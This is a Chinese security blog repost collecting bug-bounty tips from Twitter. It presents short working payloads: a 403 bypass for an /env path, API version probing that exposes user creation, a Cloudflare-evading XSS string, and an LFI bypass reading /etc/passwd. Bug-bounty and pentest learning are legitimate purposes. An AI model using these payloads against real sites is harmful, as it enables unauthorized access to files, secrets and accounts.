干货 | Twitter渗透技巧搬运工(四)

admin 2023年3月8日13:50:26评论51 views字数 909阅读3分1秒阅读模式

403 Bypass

Bug type: 403 Bypass

site[.]com/env => 403 Forbidden site[.]com/env/HTTPS2 => Bypassed

干货 | Twitter渗透技巧搬运工(四)

干货 | Twitter渗透技巧搬运工(四)

Bug Bounty Dorks

干货 | Twitter渗透技巧搬运工(四)

API hacking

API hacking Status: [Dup] Internally known

Tip: Check endpoint's on different api versions

1. GET /v2/users or /v2/users.json -> 4032. GET /v3/users -> 4033. GET /v3/users.json -> 2004. GET /v4/users -> 2005. POST /v4/users -> 200 [Users created]

bugbounty poc集合

https://github.com/zeroc00I/AllVideoPocsFromHackerOne/tree/main/weakness

命令注入备忘录

干货 | Twitter渗透技巧搬运工(四)

Cloudfalre XSS Bypass

"><sVg/OnLuFy="X=y"oNloaD=;1^confirm(1)>/``^1//

来源:https://github.com/HernanRodriguez1

补充阅读:XSS 绕过 CLOUDFLARE + 过滤器

https://0xjin.medium.com/new-xss-bypass-cloudflare-filters-2a878c01d312

本地文件包含 WAF (Cloudflare) bypass

../../etc/passwd = 403 Forbidden../../etc/random/../passwd = 200 OK


干货 | Twitter渗透技巧搬运工(四)

推荐阅读:


干货 | Twitter渗透技巧搬运工(一)


干货 | Twitter渗透技巧搬运工(二)


干货 | Twitter渗透技巧搬运工(三)


干货 | Github安全搬运工 2022年第十五期


干货 | Github安全搬运工 2022年第十六期


实战 | WAF-Bypass之SQL注入绕过思路总结


点赞,转发,在看


由HACK学习编辑整理,如需转载请注明来源HACK学习

干货 | Twitter渗透技巧搬运工(四)

原文始发于微信公众号(HACK学习呀):干货 | Twitter渗透技巧搬运工(四)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月8日13:50:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   干货 | Twitter渗透技巧搬运工(四)http://cn-sec.com/archives/1246283.html

发表评论

匿名网友 填写信息